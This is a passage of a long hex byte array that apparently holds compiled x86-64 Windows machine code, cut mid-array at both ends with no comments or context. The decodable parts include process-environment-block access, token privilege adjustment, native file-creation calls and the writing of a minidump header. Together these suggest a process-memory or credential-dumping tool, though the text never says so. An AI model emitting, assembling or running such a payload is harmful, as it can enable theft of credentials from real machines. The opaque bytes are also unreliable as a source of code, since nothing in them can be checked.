00,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE7,0x6A,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x79,0xFC,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x75,0xFC,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0x31,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0xBA,0x5C,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFB,0x6A,0x00,0x00,0x48,0x83,0xC0,0x02,0x48,0x89,0x85,0xD0,0x01,0x00,0x00,0x48,0x8D,0x55,0xB0,0x48,0x8B,0x85,0xD0,0x01,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9B,0xFC,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0x86,0x00,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x4E,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x46,0x6A,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0xD8,0xFB,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD4,0xFB,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x95,0x0E,0x00,0x00,0x48,0x8B,0x95,0x08,0x02,0x00,0x00,0x89,0x02,0x90,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0x8B,0x00,0x85,0xC0,0x0F,0x84,0x86,0x00,0x00,0x00,0xEB,0x6F,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x34,0xFE,0xFF,0xFF,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xBC,0x69,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0x4E,0xFB,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x4A,0xFB,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xE1,0xFD,0xFF,0xFF,0x90,0xE9,0xDB,0xFD,0xFF,0xFF,0x90,0xE9,0xD5,0xFD,0xFF,0xFF,0xC7,0x85,0xDC,0x01,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC1,0x1B,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x5A,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x4E,0x8B,0x85,0xBC,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x14,0x69,0x00,0x00,0x48,0x8B,0x9D,0xC0,0x01,0x00,0x00,0x48,0x8B,0x05,0xA6,0xFA,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xA2,0xFA,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x85,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x85,0xDC,0x01,0x00,0x00,0x48,0x81,0xC4,0x60,0x02,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x10,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x38,0xC2,0x75,0x16,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x3C,0x5C,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x5B,0x48,0x8B,0x45,0x10,0x0F,0xB6,0x00,0x83,0xC8,0x20,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x60,0x7E,0x06,0x80,0x7D,0xFF,0x7A,0x7E,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x3B,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x3A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x20,0x48,0x8B,0x45,0x10,0x48,0x83,0xC0,0x02,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x5C,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x81,0xEC,0x30,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xC0,0x01,0x00,0x00,0x48,0x89,0x95,0xC8,0x01,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x8D,0x15,0x05,0x88,0x00,0x00,0x48,0x89,0xC1,0xE8,0x55,0x68,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1A,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x21,0xE8,0xAF,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x19,0x68,0x00,0x00,0x48,0x8B,0x95,0xC8,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x98,0x67,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0x48,0x8D,0x55,0xA0,0x41,0xB8,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE3,0x67,0x00,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x40,0x08,0xBA,0x04,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3B,0x65,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x10,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x8D,0x14,0x00,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x10,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x0F,0xB7,0x00,0x8D,0x50,0x02,0x48,0x8B,0x85,0xC0,0x01,0x00,0x00,0x66,0x89,0x50,0x02,0x90,0x48,0x81,0xC4,0x30,0x02,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xC7,0x45,0xEC,0x60,0x00,0x00,0x00,0x8B,0x45,0xEC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xE0,0x48,0x8B,0x45,0xE0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC0,0x20,0x48,0x8B,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x8B,0x40,0x40,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xC0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x8B,0x45,0x20,0x48,0x89,0x45,0xA8,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x40,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x4C,0x8D,0x45,0xB0,0x48,0x8D,0x4D,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x05,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x55,0xA8,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x16,0x01,0x12,0x00,0x48,0x89,0xC1,0xE8,0x0F,0x1B,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x3A,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xFC,0x33,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7E,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x71,0x48,0x8B,0x45,0xF0,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x8B,0x55,0x20,0x89,0x54,0x24,0x30,0x48,0x8B,0x55,0x18,0x48,0x89,0x54,0x24,0x28,0x48,0x8D,0x55,0xB0,0x48,0x89,0x54,0x24,0x20,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF8,0x1A,0x00,0x00,0x89,0x45,0xFC,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x28,0x18,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x40,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xB0,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x03,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0xBE,0x19,0x00,0x00,0x89,0x45,0xFC,0x81,0x7D,0xFC,0x3A,0x00,0x00,0xC0,0x74,0x12,0x81,0x7D,0xFC,0x33,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xFC,0x3B,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x26,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x19,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x19,0x17,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xB0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x88,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x20,0x02,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0xC0,0x01,0x00,0x00,0x0F,0x11,0x85,0xD0,0x01,0x00,0x00,0x0F,0x11,0x85,0xE0,0x01,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xB0,0x48,0x89,0x45,0xA8,0x48,0x83,0xBD,0x20,0x02,0x00,0x00,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x7D,0x48,0x8B,0x95,0x20,0x02,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC1,0xE8,0xD1,0xFB,0xFF,0xFF,0xC7,0x85,0xC0,0x01,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0x01,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0x85,0xD0,0x01,0x00,0x00,0x48,0xC7,0x85,0xE0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xE8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x01,0x1B,0x00,0x00,0x89,0x85,0xFC,0x01,0x00,0x00,0x83,0xBD,0xFC,0x01,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0x88,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x02,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x10,0x02,0x00,0x00,0x0F,0x11,0x85,0x20,0x02,0x00,0x00,0x0F,0x11,0x85,0x30,0x02,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x48,0x89,0x45,0xE8,0x48,0x83,0xBD,0x70,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x13,0x01,0x00,0x00,0x48,0x8B,0x95,0x70,0x02,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0xB8,0xFA,0xFF,0xFF,0xC7,0x85,0x10,0x02,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x28,0x02,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x8D,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0x10,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0x2B,0x17,0x00,0x00,0x89,0x85,0x4C,0x02,0x00,0x00,0x81,0xBD,0x4C,0x02,0x00,0x00,0x43,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x42,0x81,0xBD,0x4C,0x02,0x00,0x00,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x83,0xBD,0x4C,0x02,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x79,0x14,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xD8,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0xD8,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x70,0x02,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0x10,0x02,0x00,0x00,0x0F,0x11,0x85,0x20,0x02,0x00,0x00,0x0F,0x11,0x85,0x30,0x02,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x95,0x70,0x02,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0xC1,0xE8,0x1D,0xF9,0xFF,0xFF,0xC7,0x85,0x10,0x02,0x00,0x00,0x30,0x00,0x00,0x00,0x48,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x28,0x02,0x00,0x00,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x85,0x20,0x02,0x00,0x00,0x48,0xC7,0x85,0x30,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x38,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x4C,0x8D,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0x10,0x02,0x00,0x00,0x48,0x8D,0x85,0x40,0x02,0x00,0x00,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x40,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x38,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x80,0x00,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x48,0x89,0x54,0x24,0x20,0x4D,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x89,0x00,0x12,0x00,0x48,0x89,0xC1,0xE8,0x90,0x15,0x00,0x00,0x89,0x85,0x4C,0x02,0x00,0x00,0x81,0xBD,0x4C,0x02,0x00,0x00,0x35,0x00,0x00,0xC0,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x42,0x81,0xBD,0x4C,0x02,0x00,0x00,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x83,0xBD,0x4C,0x02,0x00,0x00,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1F,0x48,0x8B,0x85,0x40,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDE,0x12,0x00,0x00,0x48,0xC7,0x85,0x40,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x81,0xC4,0xD8,0x02,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x41,0xB9,0x10,0x00,0x00,0x00,0x49,0x89,0xC0,0xBA,0x28,0x00,0x00,0x00,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xF4,0x17,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xAD,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x0F,0x83,0x45,0xF4,0x01,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0xEA,0x8B,0x45,0xF4,0x83,0xE8,0x01,0x89,0x45,0xF0,0xEB,0x73,0x48,0x8B,0x45,0x10,0x48,0x89,0x45,0xF8,0x8B,0x45,0xF0,0x89,0x45,0xEC,0xEB,0x0B,0x48,0x8B,0x45,0xF8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x8B,0x45,0xEC,0x8D,0x50,0xFF,0x89,0x55,0xEC,0x85,0xC0,0x75,0xE8,0x48,0x83,0x7D,0xF8,0x00,0x74,0x40,0x8B,0x55,0x18,0x48,0x8B,0x45,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x55,0x5F,0x00,0x00,0x48,0x8B,0x05,0xEE,0xF0,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE6,0xF0,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x83,0x6D,0xF0,0x01,0x83,0x7D,0xF0,0x00,0x79,0x87,0xEB,0x01,0x90,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x55,0x10,0x48,0x8D,0x45,0xF0,0xC7,0x44,0x24,0x28,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x10,0x00,0x00,0x49,0x89,0xD1,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0x04,0x13,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x90,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x85,0xC0,0x74,0x4B,0x48,0x8B,0x45,0x18,0x48,0x85,0xC0,0x74,0x42,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x72,0x5E,0x00,0x00,0x48,0xC7,0x45,0x18,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0x18,0x41,0xB9,0x00,0x80,0x00,0x00,0x49,0x89,0xC0,0x48,0x8D,0x55,0x10,0x48,0xC7,0xC1,0xFF,0xFF,0xFF,0xFF,0xE8,0xD3,0x12,0x00,0x00,0x89,0x45,0xFC,0xEB,0x01,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x48,0x8D,0x45,0xF8,0x48,0x89,0xC1,0xE8,0xB1,0xF1,0xFF,0xFF,0x89,0xC1,0xE8,0x32,0x5E,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x00,0x4D,0x44,0x4D,0x50,0x48,0x8B,0x45,0x18,0x66,0xC7,0x00,0x93,0xA7,0x48,0x8B,0x45,0x20,0x66,0xC7,0x00,0x00,0x00,0xE9,0xEF,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0xF2,0x5D,0x00,0x00,0xC1,0xE0,0x11,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0xE8,0xDA,0x5D,0x00,0x00,0xC1,0xE0,0x02,0x25,0xFC,0xFF,0x01,0x00,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0xE8,0xBD,0x5D,0x00,0x00,0x83,0xE0,0x03,0x89,0xC2,0x48,0x8B,0x45,0x10,0x8B,0x00,0x09,0xC2,0x48,0x8B,0x45,0x10,0x89,0x10,0x48,0x8B,0x45,0x18,0x66,0xC7,0x00,0x00,0x00,0xE8,0x9C,0x5D,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x18,0x66,0x89,0x10,0xE8,0x77,0x5D,0x00,0x00,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x18